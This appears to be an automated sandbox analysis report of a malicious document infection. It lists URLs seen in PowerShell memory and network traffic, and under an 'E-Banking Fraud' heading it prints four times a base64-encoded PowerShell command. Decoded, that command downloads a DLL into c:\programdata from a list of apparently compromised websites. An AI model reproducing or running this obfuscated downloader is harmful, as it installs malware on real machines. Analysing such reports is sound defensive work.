Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.9.3
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/images/abstract.png
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/images/logo.svg
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/js/clickEvent.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/js/dragscroll.js
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/js/parallax.js
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/js/script.js
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/themes/trasix/js/wow.min.js
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-content/uploads/2021/04/logo-trasix-dmcc-fashion-management-platform.png
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: powershell.exe, 00000005.00000002.477673890.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/wp-json/
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/TrasixME
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://unpkg.com/swiper/swiper-bundle.min.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://unpkg.com/swiper/swiper-bundle.min.js
Source: vbkwk.dll.5.dr	String found in binary or memory: https://www.instagram.com/data.square.for.it.solutions/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.linkedin.com/company/3836914
Source: vbkwk.dll.5.dr	String found in binary or memory: https://www.linkedin.com/in/data-square-for-it-solutions-b5717521b/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.parkinsons.co.in
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/
Source: vbkwk.dll.5.dr	String found in binary or memory: https://www.youtube.com/channel/UC9R4Hdjnt08LnJ1TBl6mXlw
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yoast.com/wordpress/plugins/seo/

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A	Jump to behavior
